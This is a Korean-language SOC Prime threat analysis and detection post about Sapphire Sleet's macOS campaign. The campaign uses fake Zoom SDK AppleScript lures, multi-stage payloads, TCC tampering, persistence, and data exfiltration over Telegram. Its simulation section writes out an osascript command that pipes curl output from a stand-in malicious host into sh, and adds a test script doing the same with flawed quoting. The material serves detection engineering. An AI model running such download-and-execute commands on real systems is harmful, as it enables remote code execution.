SOC Prime Bias: Critical

17 Apr 2026 15:42 UTC

Sapphire Sleet의 macOS 침입 분석: 유인에서 침해까지

Author Photo
SOC Prime Team linkedin icon 팔로우
Sapphire Sleet의 macOS 침입 분석: 유인에서 침해까지
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

마이크로소프트 위협 인텔리전스에서 북한 정부 후원의 사파이어 슬릿 행위자에게 책임이 있는 macOS 중심의 캠페인을 보고했습니다. 이 운영은 소셜 엔지니어링에 의존하여 대상에게 합법적인 줌 SDK 업데이트로 제시된 악성 AppleScript 파일을 실행하게 유도합니다. 실행되면, 스크립트는 curl and osascript를 통해 추가 페이로드를 가져와 여러 단계로 침투를 확장합니다. 이 악성코드는 자격 증명, 암호화폐 지갑 데이터 및 기타 민감한 정보를 탈취하도록 설계되었으며, 원래 macOS의 보안 보호 장치를 우회하여 감염된 시스템에서 활성 상태를 유지합니다.

조사

조사는 .scpt 유인 파일로 시작하여 일련의 curl에서osascript 페이로드 다운로드를 통해 계속되는 다단계 감염 체인을 설명합니다. 연구원들은 여러 백도어 구성 요소를 확인했습니다. 여기에 com.apple.cli가 포함됩니다. icloudzcom.google.chromes.updaters. 위협 행위자들은 또한 macOS TCC 데이터베이스를 조작하여 AppleEvents 권한을 얻고 반사적 코드 로딩 기술을 사용하고 런치 데몬을 통해 지속성을 설정하는 것으로 관찰되었습니다. 데이터 유출 활동은 사용자 에이전트 문자열을 맞춤화하고 텔레그램 봇 API를 통한 통신에 의존했습니다.

완화

Apple은 이미 캠페인의 인프라와 멀웨어 구성 요소를 방해하기 위한 안전한 브라우징 및 XProtect 업데이트를 출시했습니다. 마이크로소프트는 .scpt 파일 실행 차단, 안전하지 않은 curl 파이프라인 제한, 미승인된 TCC 데이터베이스 변경 모니터링 및 의심스러운 항목을 위한 런치 데몬 설치 감사를 권장합니다. 사용자에게 의심의 여지가 있는 소프트웨어 업데이트 프롬프트에 대해 경고하고 예상치 못한 대화상자나 스크립트를 통해 자격증명을 제공하지 않도록 해야 합니다.

응답

방어자는 악성 AppleScript 실행, 비정상적인 curl 사용자 에이전트 문자열 및 알려진 명령 및 제어 도메인으로의 아웃바운드 연결을 탐지해야 합니다. 식별된 이진 파일 및 런치 데몬은 즉시 격리하거나 제거하며, 영향을 받은 사용자의 자격증명 재설정 및 TCC 데이터베이스 무결성 검증을 수행해야 합니다. 사건 대응자는 수집된 시스템 아티팩트에 대한 포렌식 분석을 수행하고 필요한 경우 깨끗한 백업에서 영향을 받은 데이터를 복구해야 합니다.

공격 흐름

시뮬레이션 실행

선행조건: 원격 감시 및 기본 준수 사전 검사 통과했어야 합니다.

이유: 이 섹션은 탐지 규칙을 유발하도록 설계된 상대방 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령과 설명은 식별된 TTP를 반영해야 하며 탐지 로직에 의해 예상되는 정확한 텔레메트를 생성하기 위함입니다.

  • 공격 내러티브 및 명령:
    상대방은 원격 서버에 호스팅된 악성 PowerShell 스타일 스크립트를 얻었습니다. 독립 실행형 바이너리를 만들지 않기 위해, 그들은 본래의 AppleScript 인터프리터 (osascript)를 활용하고, curl 다운로드를 직접 인터프리터에 파이핑하여 하나의 명령으로 “다운로드 및 실행”을 달성합니다. 이는 규칙의 osascript+curl 패턴과 일치합니다.

    # 규칙을 트리거해야 하는 악성 한 줄 실행
    osascript -e 'do shell script "curl -s https://malicious.example.com/payload.sh | sh"'

    명령줄에 osascript and curl이 포함되어 있어 Sigma 규칙의 조건(selection_osascript 및 selection_curl)이 참으로 평가됩니다.

  • 회귀 테스트 스크립트:

    # simulate_osascript_curl.sh
    # 목적: 탐지 규칙을 일으킬 것으로 예상되는 정확한 텔레메트를 재현
    set -e
    
    # 안전을 위해 해로운 페이로드 정의 (실제 악성 코드 대신 echo 를 사용)
    MALICIOUS_URL="https://example.com/benign_payload.sh"
    
    # 단순히 메시지를 출력하는 더미 무해한 페이로드 생성.
    # 실제 레드 팀 테스트에서는 실제 스크립트를 호스팅하겠지만, 여기에서는 안전을 유지.
    curl -s -o /tmp/benign_payload.sh "$MALICIOUS_URL" || true
    
    # curl을 쉘 명령어로 파이핑하여 AppleScript 실행.
    osascript -e "do shell script "curl -s $MALICIOUS_URL | sh""
  • 정리 명령:

    # cleanup_osascript_curl.sh
    # 임시 파일 삭제 및 스트레이 프로세스 종료.
    rm -f /tmp/benign_payload.sh
    pkill -f "osascript -e"